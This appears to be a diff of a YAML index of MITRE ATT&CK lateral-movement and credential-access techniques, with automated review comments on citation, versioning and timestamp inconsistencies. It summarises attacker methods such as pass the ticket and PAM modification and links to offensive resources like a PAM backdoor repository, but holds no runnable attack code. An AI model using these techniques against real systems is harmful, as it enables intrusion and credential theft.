- source_name: macOS root VNC login without authentication
description: Nick Miles. (2017, November 30). Detecting macOS High Sierra
root account without authentication. Retrieved September 20, 2021.
url: https://www.tenable.com/blog/detecting-macos-high-sierra-root-account-without-authentication
- - source_name: VNC Vulnerabilities
- description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
- Found in Linux, Windows Solutions. Retrieved September 20, 2021.
- url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
- source_name: Offensive Security VNC Authentication Check
description: Offensive Security. (n.d.). VNC Authentication. Retrieved October
6, 2021.
url: https://www.offensive-security.com/metasploit-unleashed/vnc-authentication/
- - source_name: Attacking VNC Servers PentestLab
- description: Administrator, Penetration Testing Lab. (2012, October 30). Attacking
- VNC Servers. Retrieved October 6, 2021.
- url: https://pentestlab.blog/2012/10/30/attacking-vnc-servers/
- - source_name: Havana authentication bug
- description: Jay Pipes. (2013, December 23). Security Breach! Tenant A is
- seeing the VNC Consoles of Tenant B!. Retrieved October 6, 2021.
- url: http://lists.openstack.org/pipermail/openstack/2013-December/004138.html
- - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
- description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
- Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
- August 19, 2021.'
- url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
- source_name: Gnome Remote Desktop grd-settings
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/grd-settings.c#L207
- source_name: Gnome Remote Desktop gschema
description: Pascal Nowack. (n.d.). Retrieved September 21, 2021.
url: https://gitlab.gnome.org/GNOME/gnome-remote-desktop/-/blob/9aa9181e/src/org.gnome.desktop.remote-desktop.gschema.xml.in
+ - source_name: Apple Unified Log Analysis Remote Login and Screen Sharing
+ description: 'Sarah Edwards. (2020, April 30). Analysis of Apple Unified Logs:
+ Quarantine Edition [Entry 6] – Working From Home? Remote Logins. Retrieved
+ August 19, 2021.'
+ url: https://sarah-edwards-xzkc.squarespace.com/blog/2020/4/30/analysis-of-apple-unified-logs-quarantine-edition-entry-6-working-from-home-remote-logins
+ - source_name: VNC Vulnerabilities
+ description: Sergiu Gatlan. (2019, November 22). Dozens of VNC Vulnerabilities
+ Found in Linux, Windows Solutions. Retrieved September 20, 2021.
+ url: https://www.bleepingcomputer.com/news/security/dozens-of-vnc-vulnerabilities-found-in-linux-windows-solutions/
+ - source_name: The Remote Framebuffer Protocol
+ description: T. Richardson, J. Levine, RealVNC Ltd.. (2011, March). The Remote
+ Framebuffer Protocol. Retrieved September 20, 2021.
+ url: https://datatracker.ietf.org/doc/html/rfc6143#section-7.2.2
+ - source_name: VNC Authentication
+ description: Tegan. (2019, August 15). Setting up System Authentication. Retrieved
+ September 20, 2021.
+ url: https://help.realvnc.com/hc/en-us/articles/360002250097-Setting-up-System-Authentication
+ - source_name: Hijacking VNC
+ description: 'Z3RO. (2019, March 10). Day 70: Hijacking VNC (Enum, Brute,
+ Access and Crack). Retrieved September 20, 2021.'
+ url: https://int0x33.medium.com/day-70-hijacking-vnc-enum-brute-access-and-crack-d3d18a4601cc
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1021.005
atomic_tests: []
T1080:
technique:
- modified: '2023-05-31T12:33:20.915Z'
+ modified: '2024-10-15T16:07:36.903Z'
name: Taint Shared Content
description: |2-
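Review bot: Two references are dropped from T1021.005 here ("Attacking VNC Servers PentestLab" and "Havana authentication bug") while "VNC Vulnerabilities" and "Apple Unified Log Analysis Remote Login and Screen Sharing" are only moved; please confirm the technique description no longer contains a matching `(Citation: Havana authentication bug)` or `(Citation: Attacking VNC Servers PentestLab)`, since a dangling citation key would silently break rendering. Also, the new "The Remote Framebuffer Protocol" entry has a doubled period in `T. Richardson, J. Levine, RealVNC Ltd..`; if this text is copied verbatim from upstream ATT&CK it can stay, otherwise drop one period.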
@@ -41913,11 +42601,11 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- Linux
- macOS
- x_mitre_version: '1.4'
+ - Office Suite
+ x_mitre_version: '1.5'
x_mitre_data_sources:
- 'Network Share: Network Share Access'
- 'Process: Process Creation'
@@ -41940,9 +42628,8 @@ lateral-movement:
url: https://rewtin.blogspot.ch/2017/11/abusing-user-shares-for-efficient.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.004:
technique:
@@ -41993,7 +42680,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.004
atomic_tests: []
T1091:
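Review bot: For T1021.004 the `spec_version: '2.1'` line is removed but `x_mitre_attack_spec_version` stays at 3.1.0, whereas the same removal for T1080 just above comes with a bump to 3.2.0. The same pattern (spec_version dropped, 3.1.0 retained) recurs for T1021.002, T1021.003, T1563.002, T1550.002 and T1021.001 later in this patch. Please confirm this mirrors the upstream objects rather than a partially applied regeneration; if the generator is meant to normalise spec versions, these should all read 3.2.0.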
@@ -42057,7 +42743,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1091
atomic_tests: []
T1021.008:
@@ -42128,7 +42813,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.001:
technique:
@@ -42165,7 +42849,7 @@ lateral-movement:
url: https://matrix.org/blog/2019/05/08/post-mortem-and-remediations-for-apr-11-security-incident
description: Hodgson, M. (2019, May 8). Post-mortem and remediations for Apr
11 security incident. Retrieved February 17, 2020.
- modified: '2021-04-29T14:49:39.188Z'
+ modified: '2020-03-23T23:11:24.682Z'
name: SSH Hijacking
description: |-
Adversaries may hijack a legitimate user's SSH session to move laterally within an environment. Secure Shell (SSH) is a standard means of remote access on Linux and macOS systems. It allows a user to connect to another system via an encrypted tunnel, commonly authenticating through a password, certificate or the use of an asymmetric encryption key pair.
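Review bot: The `modified` timestamp for T1563.001 moves backwards, from 2021-04-29 to 2020-03-23; T1210 later in this patch shows the same regression (2022-05-11 to 2022-02-24). A `modified` value that decreases usually means the regeneration pulled an older copy of the object or a different bundle than the rest of the file, so it is worth checking which STIX source these two entries came from before merging.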
@@ -42196,8 +42880,6 @@ lateral-movement:
- root
x_mitre_system_requirements:
- SSH service enabled, trust relationships configured, established connections
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1021.002:
technique:
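Review bot: This hunk removes both `spec_version: '2.1'` and `x_mitre_attack_spec_version: 2.1.0` from T1563.001 without adding a replacement, so the object ends up with no attack spec version at all, unlike every other object in this patch that is bumped to 3.2.0. T1210 receives the same treatment further down. If consumers of this index key off `x_mitre_attack_spec_version`, these two objects will be the odd ones out; suggest either setting 3.2.0 here too or documenting why they are left without it.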
@@ -42280,12 +42962,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.002
atomic_tests: []
T1550:
technique:
- modified: '2024-04-12T21:18:23.798Z'
+ modified: '2024-10-15T16:09:19.001Z'
name: Use Alternate Authentication Material
description: "Adversaries may use alternate authentication material, such as
password hashes, Kerberos tickets, and application access tokens, in order
@@ -42312,6 +42993,7 @@ lateral-movement:
phase_name: lateral-movement
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Configure robust, consistent account activity audit policies
across the enterprise and with externally accessible services.(Citation: TechNet
@@ -42329,12 +43011,12 @@ lateral-movement:
x_mitre_is_subtechnique: false
x_mitre_platforms:
- Windows
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- Containers
- x_mitre_version: '1.3'
+ - Identity Provider
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Logon Session: Logon Session Creation'
@@ -42360,14 +43042,13 @@ lateral-movement:
description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
url: https://csrc.nist.gov/glossary/term/authentication
- source_name: NIST MFA
- description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
- 30, 2020.
- url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+ description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+ 25, 2024.
+ url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021:
technique:
@@ -42485,7 +43166,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563:
technique:
@@ -42539,11 +43219,10 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1021.006:
technique:
- modified: '2023-08-11T15:26:41.941Z'
+ modified: '2024-09-12T15:28:23.398Z'
name: 'Remote Services: Windows Remote Management'
description: |-
Adversaries may use [Valid Accounts](https://attack.mitre.org/techniques/T1078) to interact with remote systems using Windows Remote Management (WinRM). The adversary may then perform actions as the logged-on user.
@@ -42595,14 +43274,13 @@ lateral-movement:
April 27, 2016.
url: https://msdn.microsoft.com/en-us/library/aa394582.aspx
- source_name: Microsoft WinRM
- description: Microsoft. (n.d.). Windows Remote Management. Retrieved November
- 12, 2014.
- url: http://msdn.microsoft.com/en-us/library/aa384426
+ description: Microsoft. (n.d.). Windows Remote Management. Retrieved September
+ 12, 2024.
+ url: https://learn.microsoft.com/en-us/windows/win32/winrm/portal
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.006
atomic_tests: []
T1021.003:
@@ -42688,12 +43366,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.003
atomic_tests: []
T1550.003:
technique:
- modified: '2023-10-31T14:00:00.188Z'
+ modified: '2024-09-12T15:21:09.330Z'
name: 'Use Alternate Authentication Material: Pass the Ticket'
description: |-
Adversaries may “pass the ticket” using stolen Kerberos tickets to move laterally within an environment, bypassing normal system access controls. Pass the ticket (PtT) is a method of authenticating to a system using Kerberos tickets without having access to an account's password. Kerberos authentication can be used as the first step to lateral movement to a remote system.
@@ -42713,6 +43390,7 @@ lateral-movement:
x_mitre_contributors:
- Vincent Le Toux
- Ryan Becwar
+ x_mitre_deprecated: false
x_mitre_detection: |-
Audit all Kerberos authentication and credential use events and review for discrepancies. Unusual remote authentication events that correlate with other suspicious activity (such as writing and executing binaries) may indicate malicious activity.
@@ -42720,7 +43398,6 @@ lateral-movement:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
x_mitre_version: '1.1'
@@ -42736,39 +43413,40 @@ lateral-movement:
id: attack-pattern--7b211ac6-c815-4189-93a9-ab415deca926
created: '2020-01-30T17:03:43.072Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1550/003
external_id: T1550.003
- - source_name: ADSecurity AD Kerberos Attacks
- description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
- Kerberos Attacks. Retrieved June 2, 2016.
- url: https://adsecurity.org/?p=556
- - source_name: GentilKiwi Pass the Ticket
- description: Deply, B. (2014, January 13). Pass the ticket. Retrieved June
- 2, 2016.
- url: http://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: CERT-EU Golden Ticket Protection
+ description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
+ April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
+ url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
- source_name: Campbell 2014
description: Campbell, C. (2014). The Secret Life of Krbtgt. Retrieved December
4, 2014.
url: http://defcon.org/images/defcon-22/dc-22-presentations/Campbell/DEFCON-22-Christopher-Campbell-The-Secret-Life-of-Krbtgt.pdf
+ - source_name: GentilKiwi Pass the Ticket
+ description: Deply, B. (2014, January 13). Pass the ticket. Retrieved September
+ 12, 2024.
+ url: https://web.archive.org/web/20210515214027/https://blog.gentilkiwi.com/securite/mimikatz/pass-the-ticket-kerberos
+ - source_name: ADSecurity AD Kerberos Attacks
+ description: Metcalf, S. (2014, November 22). Mimikatz and Active Directory
+ Kerberos Attacks. Retrieved June 2, 2016.
+ url: https://adsecurity.org/?p=556
- source_name: Stealthbits Overpass-the-Hash
description: Warren, J. (2019, February 26). How to Detect Overpass-the-Hash
Attacks. Retrieved February 4, 2021.
url: https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/
- - source_name: CERT-EU Golden Ticket Protection
- description: Abolins, D., Boldea, C., Socha, K., Soria-Machado, M. (2016,
- April 26). Kerberos Golden Ticket Protection. Retrieved July 13, 2017.
- url: https://cert.europa.eu/static/WhitePapers/UPDATED%20-%20CERT-EU_Security_Whitepaper_2014-007_Kerberos_Golden_Ticket_Protection_v1_4.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1550.003
atomic_tests: []
T1021.007:
technique:
- modified: '2023-04-14T22:27:04.095Z'
+ modified: '2024-10-15T15:52:47.255Z'
name: Cloud Services
description: "Adversaries may log into accessible cloud services within a compromised
environment using [Valid Accounts](https://attack.mitre.org/techniques/T1078)
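Review bot: The only substantive changes to T1550.003's references are the archived URL and new retrieval date for "GentilKiwi Pass the Ticket" (plus the spec version bump and `revoked: false`); the rest of the hunk is the reference list being reordered, which makes the real change hard to spot in review. If the generator can emit `external_references` in a stable order (for example upstream order), future diffs of this file will be much smaller.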
@@ -42793,12 +43471,11 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- - Azure AD
- SaaS
- IaaS
- - Google Workspace
- x_mitre_version: '1.0'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.1'
x_mitre_data_sources:
- 'Logon Session: Logon Session Creation'
type: attack-pattern
@@ -42812,13 +43489,12 @@ lateral-movement:
external_id: T1021.007
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1072:
technique:
- modified: '2024-04-12T03:40:37.954Z'
+ modified: '2024-09-25T20:49:37.227Z'
name: Software Deployment Tools
description: "Adversaries may gain access to and use centralized software suites
installed within an enterprise to execute commands and move laterally through
@@ -42835,7 +43511,7 @@ lateral-movement:
on cloud-hosted instances, as well as the execution of arbitrary commands
on on-premises endpoints. For example, Microsoft Configuration Manager allows
Global or Intune Administrators to run scripts as SYSTEM on on-premises devices
- joined to Azure AD.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
+ joined to Entra ID.(Citation: SpecterOps Lateral Movement from Azure to On-Prem
AD 2020) Such services may also utilize [Web Protocols](https://attack.mitre.org/techniques/T1071/001)
to communicate back to adversary owned infrastructure.(Citation: Mitiga Security
Advisory: SSM Agent as Remote Access Trojan)\n\nNetwork infrastructure devices
@@ -42883,7 +43559,7 @@ lateral-movement:
- Windows
- Network
- SaaS
- x_mitre_version: '3.0'
+ x_mitre_version: '3.1'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Application Log: Application Log Content'
@@ -42916,7 +43592,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1072
atomic_tests: []
T1210:
@@ -42955,7 +43630,7 @@ lateral-movement:
description: National Vulnerability Database. (2017, September 24). CVE-2014-7169
Detail. Retrieved April 3, 2018.
source_name: NVD CVE-2014-7169
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-02-24T15:06:46.006Z'
name: Exploitation of Remote Services
description: |-
Adversaries may exploit remote services to gain unauthorized access to internal systems once inside of a network. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in a program, service, or within the operating system software or kernel itself to execute adversary-controlled code. A common goal for post-compromise exploitation of remote services is for lateral movement to enable access to a remote system.
@@ -42989,12 +43664,10 @@ lateral-movement:
and goal, the system and exploitable service may need to be remotely accessible
from the internal network.
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1534:
technique:
- modified: '2024-02-16T13:09:39.215Z'
+ modified: '2024-10-15T15:59:36.741Z'
name: Internal Spearphishing
description: |-
After they already have access to accounts or systems within the environment, adversaries may use internal spearphishing to gain access to additional information or compromise other users within the same organization. Internal spearphishing is multi-staged campaign where a legitimate account is initially compromised either by controlling the user's device or by compromising the account credentials of the user. Adversaries may then attempt to take advantage of the trusted internal account to increase the likelihood of tricking more victims into falling for phish attempts, often incorporating [Impersonation](https://attack.mitre.org/techniques/T1656).(Citation: Trend Micro - Int SP)
@@ -43022,10 +43695,9 @@ lateral-movement:
- Windows
- macOS
- Linux
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Content'
- 'Network Traffic: Network Traffic Flow'
@@ -43055,7 +43727,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1570:
technique:
@@ -43117,12 +43788,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1570
atomic_tests: []
T1550.004:
technique:
- modified: '2023-09-19T21:26:24.725Z'
+ modified: '2024-10-15T16:11:15.657Z'
name: Web Session Cookie
description: |-
Adversaries can use stolen session cookies to authenticate to web applications and services. This technique bypasses some multi-factor authentication protocols since the session is already authenticated.(Citation: Pass The Cookie)
@@ -43146,11 +43816,10 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- IaaS
- x_mitre_version: '1.3'
+ - Office Suite
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Web Credential: Web Credential Usage'
@@ -43175,9 +43844,8 @@ lateral-movement:
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1563.002:
technique:
@@ -43237,7 +43905,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1563.002
atomic_tests: []
T1550.002:
@@ -43292,7 +43959,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1550.002
atomic_tests: []
T1021.001:
@@ -43360,12 +44026,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1021.001
atomic_tests: []
T1550.001:
technique:
- modified: '2024-04-12T21:18:28.848Z'
+ modified: '2024-10-15T15:38:11.583Z'
name: Application Access Token
description: "Adversaries may use stolen application access tokens to bypass
the typical authentication process and access restricted accounts, information,
@@ -43422,6 +44087,7 @@ lateral-movement:
- Dylan Silva, AWS Security
- Jack Burns, HubSpot
- Blake Strom, Microsoft Threat Intelligence
+ - Pawel Partyka, Microsoft Threat Intelligence
x_mitre_deprecated: false
x_mitre_detection: 'Monitor access token activity for abnormal use and permissions
granted to unusual or suspicious applications and APIs. Additionally, administrators
@@ -43432,13 +44098,12 @@ lateral-movement:
- enterprise-attack
x_mitre_is_subtechnique: true
x_mitre_platforms:
- - Office 365
- SaaS
- - Google Workspace
- Containers
- IaaS
- - Azure AD
- x_mitre_version: '1.6'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '1.7'
x_mitre_data_sources:
- 'Web Credential: Web Credential Usage'
x_mitre_defense_bypassed:
@@ -43497,7 +44162,6 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
credential-access:
T1557:
@@ -43591,49 +44255,10 @@ credential-access:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.003:
technique:
- x_mitre_platforms:
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Scott Knight, @sdotknight, VMware Carbon Black
- - George Allen, VMware Carbon Black
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
- type: attack-pattern
- created: '2020-06-26T04:01:09.648Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.003
- url: https://attack.mitre.org/techniques/T1556/003
- - source_name: Apple PAM
- url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
- description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
- Retrieved June 25, 2020.
- - source_name: Man Pam_Unix
- url: https://linux.die.net/man/8/pam_unix
- description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
- 25, 2020.
- - source_name: Red Hat PAM
- url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
- description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
- (PAM). Retrieved June 25, 2020.
- - source_name: PAM Backdoor
- url: https://github.com/zephrax/linux-pam-backdoor
- description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
- 25, 2020.
- - source_name: PAM Creds
- url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
- description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
- PAM backdoors & DNS requests. Retrieved June 26, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-08-21T16:19:55.082Z'
name: 'Modify Authentication Process: Pluggable Authentication Modules'
description: |-
Adversaries may modify pluggable authentication modules (PAM) to access user credentials or enable otherwise unwarranted access to accounts. PAM is a modular system of configuration files, libraries, and executable files which guide authentication for many services. The most common authentication module is pam_unix.so
, which retrieves, sets, and verifies account authentication information in /etc/passwd
and /etc/shadow
.(Citation: Apple PAM)(Citation: Man Pam_Unix)(Citation: Red Hat PAM)
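Review bot: The T1556.003 description in the unchanged context lines has line breaks inside the prose ("pam_unix.so" then a new line starting ", which retrieves", and "/etc/passwd" then a new line "and /etc/shadow"), which looks like stripped inline markup from the upstream description. It is pre-existing and not introduced by this hunk, but since the whole object is being rewritten here it would be a good moment to have the generator preserve the original sentence on one line.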
@@ -43648,20 +44273,57 @@ credential-access:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Scott Knight, @sdotknight, VMware Carbon Black
+ - George Allen, VMware Carbon Black
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor PAM configuration and module paths (ex: /etc/pam.d/
) for changes. Use system-integrity tools such as AIDE and monitoring tools such as auditd to monitor PAM files.
Look for suspicious account behavior across systems that share accounts, either user, admin, or service accounts. Examples: one account logged into multiple systems simultaneously; multiple accounts logged into the same machine simultaneously; accounts logged in at odd times (ex: when the user is not present) or outside of business hours. Activity may be from interactive login sessions or process ownership from accounts being used to execute binaries on a remote system as a particular account. Correlate other security systems with login information (e.g., a user has an active login session but has not entered the building or does not have VPN access).
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'File: File Modification'
- 'Logon Session: Logon Session Creation'
- x_mitre_permissions_required:
- - root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--06c00069-771a-4d57-8ef5-d3718c1a8771
+ created: '2020-06-26T04:01:09.648Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/003
+ external_id: T1556.003
+ - source_name: Apple PAM
+ description: Apple. (2011, May 11). PAM - Pluggable Authentication Modules.
+ Retrieved June 25, 2020.
+ url: https://opensource.apple.com/source/dovecot/dovecot-239/dovecot/doc/wiki/PasswordDatabase.PAM.txt
+ - source_name: Man Pam_Unix
+ description: die.net. (n.d.). pam_unix(8) - Linux man page. Retrieved June
+ 25, 2020.
+ url: https://linux.die.net/man/8/pam_unix
+ - source_name: PAM Creds
+ description: Fernández, J. M. (2018, June 27). Exfiltrating credentials via
+ PAM backdoors & DNS requests. Retrieved June 26, 2020.
+ url: https://x-c3ll.github.io/posts/PAM-backdoor-DNS/
+ - source_name: Red Hat PAM
+ description: Red Hat. (n.d.). CHAPTER 2. USING PLUGGABLE AUTHENTICATION MODULES
+ (PAM). Retrieved June 25, 2020.
+ url: https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/managing_smart_cards/pluggable_authentication_modules
+ - source_name: PAM Backdoor
+ description: zephrax. (2018, August 3). linux-pam-backdoor. Retrieved June
+ 25, 2020.
+ url: https://github.com/zephrax/linux-pam-backdoor
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.003
atomic_tests: []
